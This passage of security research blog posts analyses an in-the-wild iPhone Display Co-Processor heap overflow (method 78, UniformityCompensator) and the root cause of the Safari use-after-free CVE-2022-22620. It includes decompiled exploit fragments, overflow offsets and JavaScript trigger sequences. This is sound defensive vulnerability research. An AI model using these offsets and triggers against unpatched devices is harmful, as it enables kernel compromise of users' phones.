  void (__cdecl *take_global_type_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *drop_global_type_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *getClassName)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *dtor_a)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *unk)(RTKIT_RC_RTTI_BASE *this);

};

Exploit flow

The exploit running in the app starts by opening an IOKit user client for the AppleCLCD2 service. AppleCLCD seems to be the application-processor version of IOMobileFrameBuffer, and AppleCLCD2 the DCP version.


The exploit only calls 3 different external method selectors on the AppleCLCD2 user client: 68, 78 and 79.


The one with the largest and most interesting-looking input is 78, which corresponds to this user client method in the kernel driver:


IOReturn

IOMobileFramebufferUserClient::s_set_block(

  IOMobileFramebufferUserClient *this,

  void *reference,

  IOExternalMethodArguments *args)

{

  const unsigned __int64 *extra_args;

  u8 *structureInput;

  structureInput = args->structureInput;

  if ( structureInput && args->scalarInputCount >= 2 )

  {

    if ( args->scalarInputCount == 2 )

      extra_args = 0LL;

    else

      extra_args = args->scalarInput + 2;

    return this->framebuffer_ap->set_block_dcp(

             this->task,

             args->scalarInput[0],

             args->scalarInput[1],

             extra_args,

             args->scalarInputCount - 2,

             structureInput,

             args->structureInputSize);

  } else {

    return 0xE00002C2;

  }

}


This unpacks the IOConnectCallMethod arguments and passes them to:


IOMobileFramebufferAP::set_block_dcp(

        IOMobileFramebufferAP *this,

        task *task,

        int first_scalar_input,

        int second_scalar_input,

        const unsigned __int64 *pointer_to_remaining_scalar_inputs,

        unsigned int scalar_input_count_minus_2,

        const unsigned __int8 *struct_input,

        unsigned __int64 struct_input_size)


This method uses some autogenerated code to serialise the external method arguments into a buffer like this:


arg_struct:

{

  struct task* task

  u64 scalar_input_0

  u64 scalar_input_1

  u64[] remaining_scalar_inputs

  u64 cntExtraScalars

  u8[] structInput

  u64 CntStructInput

}


which is then passed to UnifiedPipeline2::rpc along with a 4-byte ASCII method identifier ('A435' here):


UnifiedPipeline2::rpc(

      'A435',

      arg_struct,

      0x105Cu,

      &retval_buf,

      4u);


UnifiedPipeline2::rpc calls DCPLink::rpc which calls AppleDCPLinkService::rpc to perform one more level of serialisation which packs the method identifier and a "stream identifier" together with the arg_struct shown above.


AppleDCPLinkService::rpc then calls rpc_caller_gated to allocate space in a shared memory buffer, copy the buffer into there then signal to the DCP that a message is available.


Effectively the implementation of the IOMobileFramebuffer user client has been moved on to the DCP and the external method interface is now a proxy shim, via shared memory, to the actual implementations of the external methods which run on the DCP.

Exploit flow: the other side

The next challenge is to find where the messages start being processed on the DCP. Looking through the log strings there's a function which is clearly called rpc_callee_gated - quite likely that's the receive side of the rpc_caller_gated function we saw earlier.


rpc_callee_gated unpacks the wire format then has an enormous switch statement which maps all the 4-letter RPC codes to function pointers:


      switch ( rpc_id )

      {

        case 'A000':

          goto LABEL_146;

        case 'A001':

          handler_fptr = callback_handler_A001;

          break;

        case 'A002':

          handler_fptr = callback_handler_A002;

          break;

        case 'A003':

          handler_fptr = callback_handler_A003;

          break;

        case 'A004':

          handler_fptr = callback_handler_A004;

          break;

        case 'A005':

          handler_fptr = callback_handler_A005;

          break;


At the bottom of this switch statement is the invocation of the callback handler:


ret = handler_fptr(

          meta,

          in_struct_ptr,

          in_struct_size,

          out_struct_ptr,

          out_struct_size);


in_struct_ptr points to a copy of the serialised IOConnectCallMethod arguments we saw being serialized earlier on the application processor:


arg_struct:

{

  struct task* task

  u64 scalar_input_0

  u64 scalar_input_1

  u64[] remaining_scalar_inputs

  u32 cntExtraScalars

  u8[] structInput

  u64 cntStructInput

}


The callback unpacks that buffer and calls a C++ virtual function:


unsigned int

callback_handler_A435(

  u8* meta,

  void *args,

  uint32_t args_size,

  void *out_struct_ptr,

  uint32_t out_struct_size

{

  int64 instance_id;

  uint64_t instance;

  int err;

  int retval;

  unsigned int result;

  instance_id = meta->instance_id;

  instance =

    global_instance_table[instance_id].IOMobileFramebufferType;

  if ( !instance ) {

    log_fatal(

      "IOMFB: %s: no instance for instance ID: %u\n",

      "static T *IOMFB::InstanceTracker::instance"

        "(IOMFB::InstanceTracker::tracked_entity_t, uint32_t)"

        " [T = IOMobileFramebuffer]",

      instance_id);

  }

  err = (instance-16)->vtable_0x378( // virtual call

         (instance-16),

         args->task,

         args->scalar_input_0,

         args->scalar_input_1,

         args->remaining_scalar_inputs,

         args->cntExtraScalars,

         args->structInput,

         args->cntStructInput);

  retval = convert_error(err);

  result = 0;

  *(_DWORD *)out_struct_ptr = retval;

  return result;

}


The challenge here is to figure out where that virtual call goes. The object is being looked up in a global table based on the instance id. We can't just set a breakpoint, and whilst emulating the firmware is probably possible, that would likely be a long project in itself. I took a hackier approach: we know that the vtable needs to be at least 0x380 bytes large, so just go through all those vtables, decompile them and see if the prototypes look reasonable!


There's one clear match in the vtable for the UNPI type:

UNPI::set_block(

        UNPI* this,

        struct task* caller_task_ptr,

        unsigned int first_scalar_input,

        int second_scalar_input,

        int *remaining_scalar_inputs,

        uint32_t cnt_remaining_scalar_inputs,

        uint8_t *structure_input_buffer,

        uint64_t structure_input_size)


Here's my reversed implementation of UNPI::set_block:

UNPI::set_block(

        UNPI* this,

        struct task* caller_task_ptr,

        unsigned int first_scalar_input,

        int second_scalar_input,

        int *remaining_scalar_inputs,

        uint32_t cnt_remaining_scalar_inputs,

        uint8_t *structure_input_buffer,

        uint64_t structure_input_size)

{

  struct block_handler_holder *holder;

  struct metadispatcher metadisp;

  if ( second_scalar_input )

    return 0x80000001LL;

  holder = this->UPPipeDCP_H13P->block_handler_holders;

  if ( !holder )

    return 0x8000000BLL;

  metadisp.address_of_some_zerofill_static_buffer = &unk_3B8D18;

  metadisp.handlers_holder = holder;

  metadisp.structure_input_buffer = structure_input_buffer;

  metadisp.structure_input_size = structure_input_size;

  metadisp.remaining_scalar_inputs = remaining_scalar_inputs;

  metadisp.cnt_remaining_sclar_input = cnt_remaining_scalar_inputs;

  metadisp.some_flags = 0x40000000LL;

  metadisp.dispatcher_fptr = a_dispatcher;

  metadisp.offset_of_something_which_looks_serialization_related = &off_1C1308;

  return metadispatch(holder, first_scalar_input, 1, caller_task_ptr, structure_input_buffer, &metadisp, 0);

}


This method wraps up the arguments into another structure I've called metadispatcher:


struct __attribute__((aligned(8))) metadispatcher

{

 uint64_t address_of_some_zerofill_static_buffer;

 uint64_t some_flags;

 __int64 (__fastcall *dispatcher_fptr)(struct metadispatcher *, struct BlockHandler *, __int64, _QWORD);

 uint64_t offset_of_something_which_looks_serialization_related;

 struct block_handler_holder *handlers_holder;

 uint64_t structure_input_buffer;

 uint64_t structure_input_size;

 uint64_t remaining_scalar_inputs;

 uint32_t cnt_remaining_sclar_input;

};


That metadispatcher object is then passed to this method:


return metadispatch(holder, first_scalar_input, 1, caller_task_ptr, structure_input_buffer, &metadisp, 0);


In there we reach this code:


  block_type_handler = lookup_a_handler_for_block_type_and_subtype(

                         a1,

                         first_scalar_input, // block_type

                         a3);                // subtype


The exploit calls this set_block external method twice, passing two different values for first_scalar_input: 7 and 19. Here we can see that those correspond to looking up two different block handler objects.


The lookup function searches a linked list of block handler structures; the head of the list is stored at offset 0x1448 in the UPPipeDCP_H13P object and registered dynamically by a method I've named add_handler_for_block_type:


add_handler_for_block_type(struct block_handler_holder *handler_list,

                           struct BlockHandler *handler)

The logging code tells us that this is in a file called IOMFBBlockManager.cpp. IDA finds 44 cross-references to this method, indicating that there are probably that many different block handlers. The structure of each registered block handler is something like this:


struct __cppobj BlockHandler : RTKIT_RC_RTTI_BASE

{

  uint64_t field_16;

  struct handler_inner_types_entry *inner_types_array;

  uint32_t n_inner_types_array_entries;

  uint32_t field_36;

  uint8_t can_run_without_commandgate;

  uint32_t block_type;

  uint64_t list_link;

  uint64_t list_other_link;

  uint32_t some_other_type_field;

  uint32_t some_other_type_field2;

  uint32_t expected_structure_io_size;

  uint32_t field_76;

  uint64_t getBlock_Impl;

  uint64_t setBlock_Impl;

  uint64_t field_96;

  uint64_t back_ptr_to_UPPipeDCP_H13P;

};


The RTTI type is BLHA (BLock HAndler.)


For example, here's the codepath which builds and registers block handler type 24:


BLHA_24 = (struct BlockHandler *)CXXnew(112LL);

BLHA_24->__vftable = (BlockHandler_vtbl *)BLHA_super_vtable;

BLHA_24->block_type = 24;

BLHA_24->refcnt = 1;

BLHA_24->can_run_without_commandgate = 0;

BLHA_24->some_other_type_field = 0LL;

BLHA_24->expected_structure_io_size = 0xD20;

typeid = typeid_BLHA();

BLHA_24->typeid = typeid;

modify_typeid_ref(typeid, 1);

BLHA_24->__vftable = vtable_BLHA_subclass_type_24;

BLHA_24->inner_types_array = 0LL;

BLHA_24->n_inner_types_array_entries = 0;

BLHA_24->getBlock_Impl = BLHA_24_getBlock_Impl;

BLHA_24->setBlock_Impl = BLHA_24_setBlock_Impl;

BLHA_24->field_96 = 0LL;

BLHA_24->back_ptr_to_UPPipeDCP_H13P = a1;

add_handler_for_block_type(list_holder, BLHA_24);


Each block handler optionally has getBlock_Impl and setBlock_Impl function pointers which appear to implement the actual setting and getting operations.


We can go through all the callsites which add block handlers; tell IDA the type of the arguments and name all the getBlock and setBlock implementations:


The IDA Pro Names window showing a list of symbols like BLHA_15_getBlock_Impl.

You can perhaps see where this is going: that's looking like really quite a lot of reachable attack surface! Each of those setBlock_Impl functions is reachable by passing a different value for the first scalar argument to IOConnectCallMethod 78.


There's a little bit more reversing though to figure out how exactly to get controlled bytes to those setBlock_Impl functions:

Memory Mapping

The raw "block" input to each of those setBlock_Impl methods isn't passed inline in the IOConnectCallMethod structure input. There's another level of indirection: each individual block handler structure has an array of supported "subtypes" which contains metadata detailing where to find the (userspace) pointer to that subtype's input data in the IOConnectCallMethod structure input. The first dword in the structure input is the id of this subtype - in this case for the block handler type 19 the metadata array has a single entry:


<2, 0, 0x5F8, 0x600>


The first value (2) is the subtype id and 0x5f8 and 0x600 tell the DCP from what offset in the structure input data to read a pointer and size from. The DCP then requests a memory mapping from the AP for that memory from the calling task:


return wrap_MemoryDescriptor::withAddressRange(

  *(void*)(structure_input_buffer + addr_offset),

  *(unsigned int *)(structure_input_buffer + size_offset),

  caller_task_ptr);


We saw earlier that the AP sends the DCP the struct task pointer of the calling task; when the DCP requests a memory mapping from a user task it sends those raw task struct pointers back to the AP such that the kernel can perform the mapping from the correct task. The memory mapping is abstracted as an MDES object on the DCP side; the implementation of the mapping involves the DCP making an RPC to the AP:


make_link_call('D453', &req, 0x20, &resp, 0x14);


which corresponds to a call to this method on the AP side:


IOMFB::MemDescRelay::withAddressRange(unsigned long long, unsigned long long, unsigned int, task*, unsigned long*, unsigned long long*)


The DCP calls ::prepare and ::map on the returned MDES object (exactly like an IOMemoryDescriptor object in IOKit), gets the mapped pointer and size to pass via a few final levels of indirection to the block handler:


a_descriptor_with_controlled_stuff->dispatcher_fptr(

  a_descriptor_with_controlled_stuff,

  block_type_handler,

  important_ptr,

  important_size);


where the dispatcher_fptr looks like this:


a_dispatcher(

        struct metadispatcher *disp,

        struct BlockHandler *block_handler,

        __int64 controlled_ptr,

        unsigned int controlled_size)

{

  return block_handler->BlockHandler_setBlock(

           block_handler,

           disp->structure_input_buffer,

           disp->structure_input_size,

           disp->remaining_scalar_inputs,

           disp->cnt_remaining_sclar_input,

           disp->handlers_holder->gate,

           controlled_ptr,

           controlled_size);

}


You can see here just how useful it is to keep making structure definitions while reversing; there are so many levels of indirection that it's pretty much impossible to keep it all in your head.


BlockHandler_setBlock is a virtual method on BLHA. This is the implementation for BLHA 19:


BlockHandler19::setBlock(

  struct BlockHandler *this,

  void *structure_input_buffer,

  int64 structure_input_size,

  int64 *remaining_scalar_inputs,

  unsigned int cnt_remaining_scalar_inputs,

  struct CommandGate *gate,

  void* mapped_mdesc_ptr,

  unsigned int mapped_mdesc_length)


This uses a Command Gate (GATI) object (like a command gate in IOKit, used to serialise calls) to finally get close to actually calling the setBlock_Impl function.


We need to reverse the gate_context structure to follow the controlled data through the gate:


struct __attribute__((aligned(8))) gate_context

{

 struct BlockHandler *the_target_this;

 uint64_t structure_input_buffer;

 void *remaining_scalar_inputs;

 uint32_t cnt_remaining_scalar_inputs;

 uint32_t field_28;

 uint64_t controlled_ptr;

 uint32_t controlled_length;

};


The callgate object uses that context object to finally call the BLHA setBlock handler:


callback_used_by_callgate_in_block_19_setBlock(

  struct UnifiedPipeline *parent_pipeline,

  struct gate_context *context,

  int64 a3,

  int64 a4,

  int64 a5)

{

  return context->the_target_this->setBlock_Impl)(

           context->the_target_this->back_ptr_to_UPPipeDCP_H13P,

           context->structure_input_buffer,

           context->remaining_scalar_inputs,

           context->cnt_remaining_scalar_inputs,

           context->controlled_ptr,

           context->controlled_length);

}

SetBlock_Impl

And finally we've made it through the whole callstack following the controlled data from IOConnectCallMethod in userspace on the AP to the setBlock_Impl methods on the DCP!


The prototype of the setBlock_Impl methods looks like this:


setBlock_Impl(struct UPPipeDCP_H13P *pipe_parent,

              void *structure_input_buffer,

              int *remaining_scalar_inputs,

              int cnt_remaining_scalar_inputs,

              void* ptr_via_memdesc,

              unsigned int len_of_memdesc_mapped_buf)


The exploit calls two setBlock_Impl methods; 7 and 19. 7 is fairly simple and seems to just be used to put controlled data in a known location. 19 is the buggy one. From the log strings we can tell that block type 19 handler is implemented in a file called UniformityCompensator.cpp.


Uniformity Compensation is a way to correct for inconsistencies in brightness and colour reproduction across a display panel. Block type 19 sets and gets a data structure containing this correction information. The setBlock_Impl method calls UniformityCompensator::set and reaches the following code snippet where controlled_size is a fully-controlled u32 value read from the structure input and indirect_buffer_ptr points to the mapped buffer, the contents of which are also controlled:

uint8_t* pages = compensator->inline_buffer; // +0x24

for (int pg_cnt = 0; pg_cnt < 3; pg_cnt++) {

  uint8_t* this_page = pages;

  for (int i = 0; i < controlled_size; i++) {

    memcpy(this_page, indirect_buffer_ptr, 4 * controlled_size);

    indirect_buffer_ptr += 4 * controlled_size;

    this_page += 0x100;

  }

  pages += 0x4000;

}

There's a distinct lack of bounds checking on controlled_size. Based on the structure of the code it looks like it should be restricted to be less than or equal to 64 (as that would result in the input being completely copied to the output buffer.) The compensator->inline_buffer buffer is inline in the compensator object. The structure of the code makes it look like that buffer is probably 0xc000 (three 16k pages) large. To verify this we need to find the allocation site of this compensator object.


It's read from the pipe_parent object and we know that at this point pipe_parent is a UPPipeDCP_H13P object.


There's only one write to that field, here in UPPipeDCP_H13P::setup_tunables_base_target:


compensator = CXXnew(0xC608LL);

...

this->compensator = compensator;


The compensator object is a 0xc608 byte allocation; the 0xc000 sized buffer starts at offset 0x24 so the allocation has enough space for 0xc608-0x24=0xC5E4 bytes before corrupting neighbouring objects.


The structure input provided by the exploit for the block handler 19 setBlock call looks like this:


struct_input_for_block_handler_19[0x5F4] = 70; // controlled_size

struct_input_for_block_handler_19[0x5F8] = address;

struct_input_for_block_handler_19[0x600] = a_size;


This leads to a value of 70 (0x46) for controlled_size in the UniformityCompensator::set snippet shown earlier. (0x5f8 and 0x600 correspond to the offsets we saw earlier in the subtype's table:  <2, 0, 0x5F8, 0x600>)


The inner loop increments the destination pointer by 0x100 each iteration so 0x46 loop iterations will write 0x4618 bytes.


The outer loop writes to three subsequent 0x4000 byte blocks so the third (final) iteration starts writing at 0x24 + 0x8000 and writes a total of 0x4618 bytes, meaning the object would need to be 0xC63C bytes; but we can see that it's only 0xc608, meaning that it will overflow the allocation size by 0x34 bytes. The RTKit malloc implementation looks like it adds 8 bytes of metadata to each allocation so the next object starts at 0xc610.


How much input is consumed? The input is fully consumed with no "rewinding" so it's 3*0x46*0x46*4 = 0xe5b0 bytes. Working backwards from the end of that buffer we know that the final 0x34 bytes of it go off the end of the 0xc608 allocation, which means +0xe57c in the input buffer will be the first byte which corrupts the 8 metadata bytes and +0xe584 will be the first byte to corrupt the next object:
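To sanity-check that arithmetic, here's a small standalone sketch (my own verification code, not from the exploit) that reproduces the offsets:

#include <stdio.h>

int main(void)
{
    unsigned sz = 0x46;       /* controlled_size = 70        */
    unsigned alloc = 0xc608;  /* compensator allocation size */
    unsigned buf_off = 0x24;  /* inline_buffer offset        */

    /* Each inner iteration copies 4*sz bytes, sz times per outer page. */
    unsigned consumed = 3 * sz * sz * 4;
    /* The last outer iteration starts at buf_off + 2*0x4000; its last
     * inner write ends (sz-1)*0x100 + 4*sz bytes beyond that. */
    unsigned end = buf_off + 2 * 0x4000 + (sz - 1) * 0x100 + 4 * sz;

    printf("input consumed: 0x%x\n", consumed);      /* 0xe5b0 */
    printf("write ends at:  0x%x\n", end);           /* 0xc63c */
    printf("overflow by:    0x%x\n", end - alloc);   /* 0x34   */
    printf("metadata hit from input offset    0x%x\n",
           consumed - (end - alloc));                /* 0xe57c */
    printf("next object hit from input offset 0x%x\n",
           consumed - (end - (alloc + 8)));          /* 0xe584 */
    return 0;
}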


A diagram showing that the end of the overflower object overlaps with the metadata and start of the target object.

This matches up exactly with the overflow object which the exploit builds:


  v24 = address + 0xE584;

  v25 = *(_DWORD *)&v54[48];

  v26 = *(_OWORD *)&v54[32];

  v27 = *(_OWORD *)&v54[16];

  *(_OWORD *)(address + 0xE584) = *(_OWORD *)v54;

  *(_OWORD *)(v24 + 16) = v27;

  *(_OWORD *)(v24 + 32) = v26;

  *(_DWORD *)(v24 + 48) = v25;


The destination object seems to be allocated very early and the DCP RTKit environment appears to be very deterministic with no ASLR. Almost certainly they are attempting to corrupt a neighbouring C++ object with a fake vtable pointer.


Unfortunately for our analysis the trail goes cold here and we can't fully recreate the rest of the exploit. The bytes for the fake DCP C++ object are read from a file in the app's temporary directory (base64 encoded inside a JSON file under the exploit_struct_offsets key) and I don't have a copy of that file. But based on the flow of the rest of the exploit it's pretty clear what happens next:

sudo make me a DART mapping

The DCP, like other coprocessors on iPhone, sits behind a DART (Device Address Resolution Table.) This is like an SMMU (IOMMU in the x86 world) which forces an extra layer of physical address lookup between the DCP and physical memory. DART was covered in great detail in Gal Beniamini's Over The Air - Vol. 2, Pt. 3 blog post.


The DCP clearly needs to access lots of buffers owned by userspace tasks as well as memory managed by the kernel. To do this the DCP makes RPC calls back to the AP which modifies the DART entries accordingly. This appears to be exactly what the DCP exploit does: the D45X family of DCP->AP RPC methods appear to expose an interface for requesting arbitrary physical as well as virtual addresses to be mapped into the DCP DART.


The fake C++ object is most likely a stub which makes such calls on behalf of the exploit, allowing the exploit to read and write kernel memory.

Conclusions

Segmentation and isolation are in general a positive thing when it comes to security. However, splitting up an existing system into separate, intercommunicating parts can end up exposing unexpected code in unexpected ways.


We've had discussions within Project Zero about whether this DCP vulnerability is interesting at all. After all, if the UniformityCompensator code was going to be running on the Application Processors anyway then the Display Co-Processor didn't really introduce or cause this bug.


Whilst that's true, it's also the case that the DCP certainly made exploitation of this bug significantly easier and more reliable than it would have been on the AP. Apple has invested heavily in memory corruption mitigations over the last few years, so moving an attack surface from a "mitigation heavy" environment to a "mitigation light" one is a regression in that sense.


Another perspective is that the DCP just isn't isolated enough; perhaps the intention was to try to isolate the code on the DCP such that even if it's compromised it's limited in the effect it could have on the entire system. For example, there might be models where the DCP to AP RPC interface is much more restricted.


But again there's a tradeoff: the more restrictive the RPC API, the more the DCP code has to be refactored - a significant investment. Currently, the codebase relies on being able to map arbitrary memory and the API involves passing userspace pointers back and forth.


I've discussed in recent posts how attackers tend to be ahead of the curve. As the curve slowly shifts towards memory corruption exploitation getting more expensive, attackers are likely shifting too. We saw that in the logic-bug sandbox escape used by NSO and we see that here in this memory-corruption-based privilege escalation that side-stepped kernel mitigations by corrupting memory on a co-processor instead. Both are quite likely to continue working in some form in a post-memory tagging world. Both reveal the stunning depth of attack surface available to the motivated attacker. And both show that defensive security research still has a lot of work to do.

An Autopsy on a Zombie In-the-Wild 0-day

14 June 2022 at 16:00

Posted by Maddie Stone, Google Project Zero

Whenever there’s a new in-the-wild 0-day disclosed, I’m very interested in understanding the root cause of the bug. This allows us to then understand if it was fully fixed, look for variants, and brainstorm new mitigations. This blog is the story of a “zombie” Safari 0-day and how it came back from the dead to be disclosed as exploited in-the-wild in 2022. CVE-2022-22620 was initially fixed in 2013, reintroduced in 2016, and then disclosed as exploited in-the-wild in 2022. If you’re interested in the full root cause analysis for CVE-2022-22620, we’ve published it here.

In the 2020 Year in Review of 0-days exploited in the wild, I wrote how 25% of all 0-days detected and disclosed as exploited in-the-wild in 2020 were variants of previously disclosed vulnerabilities. Almost halfway through 2022 and it seems like we’re seeing a similar trend. Attackers don’t need novel bugs to effectively exploit users with 0-days, but instead can use vulnerabilities closely related to previously disclosed ones. This blog focuses on just one example from this year because it’s a little bit different from other variants that we’ve discussed before. Most variants we’ve discussed previously exist due to incomplete patching. But in this case, the variant was completely patched when the vulnerability was initially reported in 2013. However, the variant was reintroduced 3 years later during large refactoring efforts. The vulnerability then continued to exist for 5 years until it was fixed as an in-the-wild 0-day in January 2022.

Getting Started

In the case of CVE-2022-22620 I had two pieces of information to help me figure out the vulnerability: the patch (thanks to Apple for sharing with me!) and the description from the security bulletin stating that the vulnerability is a use-after-free. The primary change in the patch was to change the type of the second argument (stateObject) of the function FrameLoader::loadInSameDocument from a raw pointer, SerializedScriptValue*, to a reference-counted pointer, RefPtr<SerializedScriptValue>.

trunk/Source/WebCore/loader/FrameLoader.cpp (lines 1094-1096):

   // This does the same kind of work that didOpenURL does, except it relies on the fact

   // that a higher level already checked that the URLs match and the scrolling is the right thing to do.

 - void FrameLoader::loadInSameDocument(const URL& url, SerializedScriptValue* stateObject, bool isNewNavigation)

 + void FrameLoader::loadInSameDocument(URL url, RefPtr<SerializedScriptValue> stateObject, bool isNewNavigation)

Whenever I’m doing a root cause analysis on a browser in-the-wild 0-day, along with studying the code, I also usually search through commit history and bug trackers to see if I can find anything related. I do this to try and understand when the bug was introduced, but also to try and save time. (There’s a lot of 0-days to be studied! 😀)

The Previous Life

In the case of CVE-2022-22620, I was scrolling through the git blame view of FrameLoader.cpp. Specifically I was looking at the definition of loadInSameDocument. The git blame for this line prior to our patch points to a very interesting commit: it changed the stateObject argument from a reference-counted pointer, PassRefPtr<SerializedScriptValue>, to a raw pointer, SerializedScriptValue*. This change from December 2016 introduced CVE-2022-22620. The ChangeLog even states:


(WebCore::FrameLoader::loadInSameDocument): Take a raw pointer for the

serialized script value state object. No one was passing ownership.

But pass it along to statePopped as a Ref since we need to pass ownership

of the null value, at least for now.

Now I was intrigued and wanted to track down the previous commit that had changed the stateObject argument to PassRefPtr<SerializedScriptValue>. I was in luck and only had to go back in the history two more steps. There was a commit from 2013 that changed the stateObject argument from the raw pointer, SerializedScriptValue*, to a reference-counted pointer, PassRefPtr<SerializedScriptValue>. This commit from February 2013 was doing the same thing that our commit in 2022 was doing. The commit was titled “Use-after-free in SerializedScriptValue::deserialize” and included a good description of how that use-after-free worked.

The commit also included a test:

Added a test that demonstrated a crash due to use-after-free

of SerializedScriptValue.

Test: fast/history/replacestate-nocrash.html

The trigger from this test is:

Object.prototype.__defineSetter__("foo",function(){history.replaceState("", "")});
history.replaceState({foo:1,zzz:"a".repeat(1<<22)}, "");
history.state.length;

My hope was that the test would crash the vulnerable version of WebKit and I’d be done with my root cause analysis and could move on to the next bug. Unfortunately, it didn’t crash.

The commit description included a comment to check out a Chromium bug. (At the time, Chromium still used the WebKit rendering engine; Chromium forked WebKit to create the Blink rendering engine in April 2013.) I saw that my now Project Zero teammate, Sergei Glazunov, originally reported the Chromium bug back in 2013, so I asked him for the details.

The use-after-free from 2013 (no CVE was assigned) was a bug in the implementation of the History API. This API allows access to (and modification of) a stack of the pages visited in the current frame, and these page states are stored as a SerializedScriptValue. The History API exposes a getter for state, and a method replaceState which allows overwriting the "most recent" history entry.

The bug was that in the implementation of the getter for state, SerializedScriptValue::deserialize was called on the current "most recent" history entry value without increasing its reference count. As SerializedScriptValue::deserialize could trigger a callback into user JavaScript, the callback could call replaceState to drop the only reference to the history entry value by replacing it with a new value. When the callback returned, the rest of SerializedScriptValue::deserialize ran with a free'd this pointer.
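To make the lifetime problem concrete, here's a minimal, self-contained C++ sketch of the bug pattern. This is not WebKit's code (WebKit uses RefPtr/Ref rather than std::shared_ptr, and all names below are invented for illustration): a method runs on an object whose only reference lives in a container, and a user-controlled callback invoked mid-method replaces that container entry, destroying the object out from under the rest of the method.

#include <cstdio>
#include <functional>
#include <memory>

// Stand-in for SerializedScriptValue; hypothetical, for illustration only.
struct StateValue {
    int payload = 42;
    ~StateValue() { std::printf("StateValue destroyed\n"); }

    // Stand-in for deserialize(): may call back into "user script".
    void deserialize(const std::function<void()>& userCallback) {
        userCallback();  // e.g. a setter defined on Object.prototype
        std::printf("payload: %d\n", payload);  // use-after-free if the callback dropped the last reference
    }
};

// Stand-in for the history entry holding the "most recent" state.
std::shared_ptr<StateValue> g_currentState = std::make_shared<StateValue>();

int main() {
    // Buggy pattern: call through a raw pointer without taking a reference.
    StateValue* raw = g_currentState.get();
    raw->deserialize([] {
        // Analogous to history.replaceState() swapping out the old state:
        // this drops the last reference and destroys the object mid-call.
        g_currentState = std::make_shared<StateValue>();
    });

    // Fixed pattern (the shape of both the 2013 and 2022 patches): hold a
    // strong reference across the call so the callback can't destroy the object.
    std::shared_ptr<StateValue> strong = g_currentState;
    strong->deserialize([] {
        g_currentState = std::make_shared<StateValue>();
    });  // safe: 'strong' keeps the object alive until the call returns
}

The second shape is the essence of the fix: take a strong, reference-counted reference before making any call that might run user JavaScript.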

In order to fix this bug, it appears that the developers decided to change every caller of SerializedScriptValue::deserialize to increase the reference count on the stateObject by changing the argument types from a raw pointer to PassRefPtr<SerializedScriptValue>.  While the originally reported trigger called deserialize on the stateObject through the V8History::stateAccessorGetter function, the developers’ fix also caught and patched the path to deserialize through loadInSameDocument.

The timeline of the changes impacting the stateObject is:

  • HistoryItem.m_stateObject is type RefPtr<SerializedScriptValue>
  • HistoryItem::stateObject() returns SerializedScriptValue*
  • FrameLoader::loadInSameDocument takes stateObject argument as SerializedScriptValue*
  • HistoryItem::stateObject returns a PassRefPtr<SerializedScriptValue>
  • FrameLoader::loadInSameDocument takes stateObject argument as PassRefPtr<SerializedScriptValue>
  • HistoryItem::stateObject returns RefPtr instead of PassRefPtr
  • HistoryItem::stateObject() is changed to return raw pointer instead of RefPtr
  • FrameLoader::loadInSameDocument changed to take stateObject as a raw pointer instead of PassRefPtr<SerializedScriptValue>
  • FrameLoader::loadInSameDocument changed to take stateObject as a RefPtr<SerializedScriptValue>

The Autopsy

When we look at the timeline of changes for FrameLoader::loadInSameDocument it seems that the bug was re-introduced in December 2016 due to refactoring. The question is: why did the patch author think that loadInSameDocument would not need to hold a reference? From the December 2016 commit ChangeLog: Take a raw pointer for the serialized script value state object. No one was passing ownership.

My assessment is that it’s due to the October 2016 changes in HistoryItem::stateObject. When the author was evaluating the refactoring changes needed in the dom directory in December 2016, it would have appeared that the only calls to loadInSameDocument passed in either a null value or the result of stateObject(), which, as of October 2016, returned a raw SerializedScriptValue* pointer. When looking at those two options for the type of the argument, it’s potentially understandable that the developer thought that loadInSameDocument did not need to share ownership of stateObject.

So why then was HistoryItem::stateObject’s return value changed from a RefPtr to a raw pointer in October 2016? That I’m struggling to find an explanation for.

According to the description, the patch in October 2016 was intended to “Replace all uses of ExceptionCodeWithMessage with WebCore::Exception”. However, when we look at the ChangeLog it seems that the author decided to also do some (seemingly unrelated) refactoring to HistoryItem. These are some of the only changes in the commit whose descriptions aren’t related to exceptions. As an outsider looking at the commits, it seems that the developer simply thought they’d do a little “clean-up” while working through the required refactoring on the exceptions. If this was an additional ad-hoc step while in the code, rather than the goal of the commit, it seems plausible that the developer and reviewers may not have fully traced the lifetime of HistoryItem::stateObject.

While the change to HistoryItem in October 2016 was not sufficient to introduce the bug, it seems that that change likely contributed to the developer in December 2016 thinking that loadInSameDocument didn’t need to increase the reference count on the stateObject.

Both the October 2016 and the December 2016 commits were very large. The commit in October changed 40 files with 900 additions and 1225 deletions. The commit in December changed 95 files with 1336 additions and 1325 deletions. It seems untenable for any developers or reviewers to understand the security implications of each change in those commits in detail, especially since they’re related to lifetime semantics.

The Zombie

We’ve now tracked down the evolution of the changes that fixed the 2013 vulnerability… and then reverted those fixes… so I got back to identifying the 2022 bug. It’s the same bug, but triggered through a different path. That’s why the 2013 test case wasn’t crashing the version of WebKit that should have been vulnerable to CVE-2022-22620:

  1. The 2013 test case triggers the bug through the V8History::stateAccessorGetter path instead of FrameLoader::loadInSameDocument, and
  2. As a part of Sergei’s 2013 bug report there were additional hardening measures put into place that prevented user-code callbacks being processed during deserialization. 

Therefore we needed to figure out how to call loadInSameDocument, and instead of using deserialization to trigger a JavaScript callback, we needed to find another event in the loadInSameDocument function that would trigger a callback into user JavaScript.

To quickly figure out how to call loadInSameDocument, I modified the WebKit source code to trigger a test failure if loadInSameDocument was ever called and then ran all the tests in the fast/history directory. 5 out of the 80 tests called loadInSameDocument.
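A hypothetical sketch of that instrumentation idea (this is not the actual modification; the stand-in function name is invented):

#include <cstdio>
#include <cstdlib>

// Make the function under study fail loudly, then run the test suite and
// note which tests crash.
static void loadInSameDocumentProbe() {  // stand-in for FrameLoader::loadInSameDocument
    std::fprintf(stderr, "loadInSameDocument reached\n");
    std::abort();  // any test that reaches this function now fails visibly
}

int main() {
    loadInSameDocumentProbe();
}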

The tests fast/history/history-back-forward-within-subframe-hash.html and fast/history/history-traversal-is-asynchronous.html were the most helpful. We can trigger the call to loadInSameDocument by pushing a history entry whose URL is the same page, but includes a hash, and then calling history.back() to go back to that state. loadInSameDocument is responsible for scrolling to that location.

history.pushState("state1", "", location + "#foo");

history.pushState("state2", ""); // current state

history.back(); //goes back to state1, triggering loadInSameDocument

 

